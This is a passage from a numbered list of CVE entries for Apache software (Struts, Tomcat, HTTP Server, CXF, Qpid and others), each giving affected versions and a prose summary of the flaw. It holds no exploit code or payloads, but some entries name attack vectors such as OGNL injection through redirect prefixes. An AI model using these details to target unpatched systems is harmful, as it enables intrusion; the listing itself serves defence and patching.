13100| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
13101| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
13102| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
13103| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
13104| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
13105| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
13106| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
13107| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
13108| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
13109| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
13110| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
13111| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
13112| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
13113| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
13114| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
13115| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
13116| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
13117| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
13118| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
13119| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
13120| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
13121| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not property implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
13122| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
13123| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
13124| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
13125| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
13126| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13127| [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
13128| [CVE-2013-0253] The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.
13129| [CVE-2013-0248] The default configuration of javax.servlet.context.tempdir in Apache Commons FileUpload 1.0 through 1.2.2 uses the /tmp directory for uploaded files, which allows local users to overwrite arbitrary files via an unspecified symlink attack.
13130| [CVE-2013-0239] Apache CXF before 2.5.9, 2.6.x before 2.6.6, and 2.7.x before 2.7.3, when the plaintext UsernameToken WS-SecurityPolicy is enabled, allows remote attackers to bypass authentication via a security header of a SOAP request containing a UsernameToken element that lacks a password child element.
13131| [CVE-2012-6573] Cross-site scripting (XSS) vulnerability in the Apache Solr Autocomplete module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via vectors involving autocomplete results.
13132| [CVE-2012-6551] The default configuration of Apache ActiveMQ before 5.8.0 enables a sample web application, which allows remote attackers to cause a denial of service (broker resource consumption) via HTTP requests.
13133| [CVE-2012-6092] Multiple cross-site scripting (XSS) vulnerabilities in the web demos in Apache ActiveMQ before 5.8.0 allow remote attackers to inject arbitrary web script or HTML via (1) the refresh parameter to PortfolioPublishServlet.java (aka demo/portfolioPublish or Market Data Publisher), or vectors involving (2) debug logs or (3) subscribe messages in webapp/websocket/chat.js. NOTE: AMQ-4124 is covered by CVE-2012-6551.
13134| [CVE-2012-5887] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 does not properly check for stale nonce values in conjunction with enforcement of proper credentials, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests.
13135| [CVE-2012-5886] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 caches information about the authenticated user within the session state, which makes it easier for remote attackers to bypass authentication via vectors related to the session ID.
13136| [CVE-2012-5885] The replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.
13137| [CVE-2012-5786] The wsdl_first_https sample code in distribution/src/main/release/samples/wsdl_first_https/src/main/ in Apache CXF, possibly 2.6.0, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13138| [CVE-2012-5785] Apache Axis2/Java 1.6.2 and earlier does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13139| [CVE-2012-5784] Apache Axis 1.4 and earlier, as used in PayPal Payments Pro, PayPal Mass Pay, PayPal Transactional Information SOAP, the Java Message Service implementation in Apache ActiveMQ, and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13140| [CVE-2012-5783] Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
13141| [CVE-2012-5633] The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before 2.6.5, and 2.7.x before 2.7.2, when using the WSS4JInInterceptor, bypasses WS-Security processing, which allows remote attackers to obtain access to SOAP services via an HTTP GET request.
13142| [CVE-2012-5616] Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly Citrix CloudStack) before 3.0.6 stores sensitive information in the log4j.conf log file, which allows local users to obtain (1) the SSH private key as recorded by the createSSHKeyPair API, (2) the password of an added host as recorded by the AddHost API, or the password of an added VM as recorded by the (3) DeployVM or (4) ResetPasswordForVM API.
13143| [CVE-2012-5568] Apache Tomcat through 7.0.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris.
13144| [CVE-2012-5351] Apache Axis2 allows remote attackers to forge messages and bypass authentication via a SAML assertion that lacks a Signature element, aka a "Signature exclusion attack," a different vulnerability than CVE-2012-4418.
13145| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
13146| [CVE-2012-4557] The mod_proxy_ajp module in the Apache HTTP Server 2.2.12 through 2.2.21 places a worker node into an error state upon detection of a long request-processing time, which allows remote attackers to cause a denial of service (worker consumption) via an expensive request.
13147| [CVE-2012-4556] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 allows remote attackers to cause a denial of service (Apache httpd web server child process restart) via certain unspecified empty search fields in a user certificate search query.
13148| [CVE-2012-4555] The token processing system (pki-tps) in Red Hat Certificate System (RHCS) before 8.1.3 does not properly handle interruptions of token format operations, which allows remote attackers to cause a denial of service (NULL pointer dereference and Apache httpd web server child process crash) via unspecified vectors.
13149| [CVE-2012-4534] org/apache/tomcat/util/net/NioEndpoint.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28, when the NIO connector is used in conjunction with sendfile and HTTPS, allows remote attackers to cause a denial of service (infinite loop) by terminating the connection during the reading of a response.
13150| [CVE-2012-4528] The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.
13151| [CVE-2012-4501] Citrix Cloud.com CloudStack, and Apache CloudStack pre-release, allows remote attackers to make arbitrary API calls by leveraging the system user account, as demonstrated by API calls to delete VMs.
13152| [CVE-2012-4460] The serializing/deserializing functions in the qpid::framing::Buffer class in Apache Qpid 0.20 and earlier allow remote attackers to cause a denial of service (assertion failure and daemon exit) via unspecified vectors. NOTE: this issue could also trigger an out-of-bounds read, but it might not trigger a crash.
13153| [CVE-2012-4459] Integer overflow in the qpid::framing::Buffer::checkAvailable function in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (crash) via a crafted message, which triggers an out-of-bounds read.
13154| [CVE-2012-4458] The AMQP type decoder in Apache Qpid 0.20 and earlier allows remote attackers to cause a denial of service (memory consumption and server crash) via a large number of zero width elements in the client-properties map in a connection.start-ok message.
13155| [CVE-2012-4446] The default configuration for Apache Qpid 0.20 and earlier, when the federation_tag attribute is enabled, accepts AMQP connections without checking the source user ID, which allows remote attackers to bypass authentication and have other unspecified impact via an AMQP request.
13156| [CVE-2012-4431] org/apache/catalina/filters/CsrfPreventionFilter.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.32 allows remote attackers to bypass the cross-site request forgery (CSRF) protection mechanism via a request that lacks a session identifier.
13157| [CVE-2012-4418] Apache Axis2 allows remote attackers to forge messages and bypass authentication via an "XML Signature wrapping attack."
13158| [CVE-2012-4387] Apache Struts 2.0.0 through 2.3.4 allows remote attackers to cause a denial of service (CPU consumption) via a long parameter name, which is processed as an OGNL expression.
13159| [CVE-2012-4386] The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.
13160| [CVE-2012-4360] Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0.10.19.1 through 0.10.22.4 for the Apache HTTP Server allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13161| [CVE-2012-4063] The Apache Santuario configuration in Eucalyptus before 3.1.1 does not properly restrict applying XML Signature transforms to documents, which allows remote attackers to cause a denial of service via unspecified vectors.
13162| [CVE-2012-4001] The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server does not properly verify its host name, which allows remote attackers to trigger HTTP requests to arbitrary hosts via unspecified vectors, as demonstrated by requests to intranet servers.
13163| [CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
13164| [CVE-2012-3546] org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.30, when FORM authentication is used, allows remote attackers to bypass security-constraint checks by leveraging a previous setUserPrincipal call and then placing /j_security_check at the end of a URI.
13165| [CVE-2012-3544] Apache Tomcat 6.x before 6.0.37 and 7.x before 7.0.30 does not properly handle chunk extensions in chunked transfer coding, which allows remote attackers to cause a denial of service by streaming data.
13166| [CVE-2012-3526] The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the Apache HTTP Server allows remote attackers to cause a denial of service (server or application crash) via multiple X-Forwarded-For headers in a request.
13167| [CVE-2012-3513] munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.
13168| [CVE-2012-3506] Unspecified vulnerability in the Apache Open For Business Project (aka OFBiz) 10.04.x before 10.04.03 has unknown impact and attack vectors.
13169| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
13170| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
13171| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
13172| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
13173| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
13174| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
13175| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
13176| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
13177| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
13178| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
13179| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
13180| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
13181| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
13182| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
13183| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
13184| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
13185| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
13186| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
13187| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
13188| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
13189| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
13190| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
13191| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
13192| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
13193| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
13194| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
13195| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
13196| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
13197| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
13198| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
13199| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
13200| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
13201| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
13202| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
13203| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
13204| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
13205| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
13206| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
13207| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
13208| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
13209| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
13210| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
13211| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
13212| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
13213| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
13214| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
13215| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
13216| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
13217| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
13218| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
13219| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
13220| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
13221| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
